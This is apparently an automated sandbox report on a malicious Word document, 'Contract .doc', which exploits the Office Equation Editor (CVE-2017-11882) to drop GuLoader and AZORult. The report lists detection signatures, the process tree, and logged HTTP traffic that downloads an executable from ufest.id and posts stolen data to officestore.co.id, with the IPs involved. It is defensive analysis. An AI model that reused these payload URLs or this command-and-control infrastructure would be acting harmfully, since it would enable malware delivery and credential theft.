Loading ...

Play interactive tourEdit tour

Analysis Report Contract .doc

Overview

General Information

Sample Name:Contract .doc
Analysis ID:288984
MD5:4f8313415a181979db96b6c4c1ed20e2
SHA1:edf5a68aafde8c3f61fdbedd997adc38f2ddbd25
SHA256:5278046daacc4237354be9a2b1094f6a9467e317b17c959c772ed5a86e25d737
Tags:doc

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Binary contains a suspicious time stamp
Contains functionality to hide a thread from the debugger
Hides threads from debuggers
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries information about the installed CPU (vendor, model number etc)
Searches for user specific document files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1888 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2484 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • hjdhfujdhg.exe (PID: 2840 cmdline: C:\Users\user\AppData\Roaming\hjdhfujdhg.exe MD5: ACC9728C11B4DE0ED1BD7C45BAFAD61F)
      • hjdhfujdhg.exe (PID: 2332 cmdline: C:\Users\user\AppData\Roaming\hjdhfujdhg.exe MD5: ACC9728C11B4DE0ED1BD7C45BAFAD61F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: hjdhfujdhg.exe PID: 2840JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
    Process Memory Space: hjdhfujdhg.exe PID: 2840JoeSecurity_GuLoaderYara detected GuLoaderJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\hjdhfujdhg.exe, CommandLine: C:\Users\user\AppData\Roaming\hjdhfujdhg.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\hjdhfujdhg.exe, NewProcessName: C:\Users\user\AppData\Roaming\hjdhfujdhg.exe, OriginalFileName: C:\Users\user\AppData\Roaming\hjdhfujdhg.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2484, ProcessCommandLine: C:\Users\user\AppData\Roaming\hjdhfujdhg.exe, ProcessId: 2840
      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.247.8.223, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2484, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
      Sigma detected: File Dropped By EQNEDT32EXEShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2484, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\linkercre[1].exe

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for domain / URLShow sources
      Source: officestore.co.idVirustotal: Detection: 8%Perma Link
      Source: http://officestore.co.id/linkzer/PL341/index.phpVirustotal: Detection: 10%Perma Link
      Multi AV Scanner detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\linkercre[1].exeVirustotal: Detection: 19%Perma Link
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\linkercre[1].exeReversingLabs: Detection: 18%
      Multi AV Scanner detection for submitted fileShow sources
      Source: Contract .docVirustotal: Detection: 41%Perma Link
      Source: Contract .docReversingLabs: Detection: 42%

      Exploits:

      barindex
      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\hjdhfujdhg.exeJump to behavior
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: global trafficDNS query: name: ufest.id
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 103.247.8.223:443
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.247.8.223:80

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2029405 ET TROJAN Win32/AZORult V3.3 Client Checkin M2 192.168.2.22:49173 -> 103.247.10.55:80
      Source: TrafficSnort IDS: 2029136 ET TROJAN AZORult v3.3 Server Response M1 103.247.10.55:80 -> 192.168.2.22:49173
      Source: Joe Sandbox ViewASN Name: RUMAHWEB-AS-IDRumahwebIndonesiaCVID RUMAHWEB-AS-IDRumahwebIndonesiaCVID
      Source: Joe Sandbox ViewASN Name: RUMAHWEB-AS-IDRumahwebIndonesiaCVID RUMAHWEB-AS-IDRumahwebIndonesiaCVID
      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
      Source: global trafficHTTP traffic detected: GET /kunu/linkercre.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ufest.idConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: POST /linkzer/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: officestore.co.idContent-Length: 107Cache-Control: no-cacheData Raw: 00 00 00 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 34 11 8b 30 62 8b 30 60 8b 30 6c 8b 30 66 8b 30 61 ea 26 67 ea 26 66 99 26 66 9f 26 66 99 45 10 8b 30 64 8b 30 67 8b 30 67 Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp40b0`0l0f0a&g&f&f&fE0d0g0g
      Source: global trafficHTTP traffic detected: POST /linkzer/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: officestore.co.idContent-Length: 32712Cache-Control: no-cache
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1A2C0415-5575-4F65-9737-3BA52E43A74D}.tmpJump to behavior
      Source: global trafficHTTP traffic detected: GET /kunu/linkercre.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ufest.idConnection: Keep-Alive
      Source: unknownDNS traffic detected: queries for: ufest.id
      Source: unknownHTTP traffic detected: POST /linkzer/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: officestore.co.idContent-Length: 107Cache-Control: no-cacheData Raw: 00 00 00 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 34 11 8b 30 62 8b 30 60 8b 30 6c 8b 30 66 8b 30 61 ea 26 67 ea 26 66 99 26 66 9f 26 66 99 45 10 8b 30 64 8b 30 67 8b 30 67 Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp40b0`0l0f0a&g&f&f&fE0d0g0g
      Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.2.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
      Source: mozglue.dll.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
      Source: mozglue.dll.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
      Source: mozglue.dll.5.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
      Source: mozglue.dll.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
      Source: mozglue.dll.5.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
      Source: mozglue.dll.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: mozglue.dll.5.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
      Source: 77EC63BDA74BD0D0E0426DC8F8008506.2.drString found in binary or memory: http://c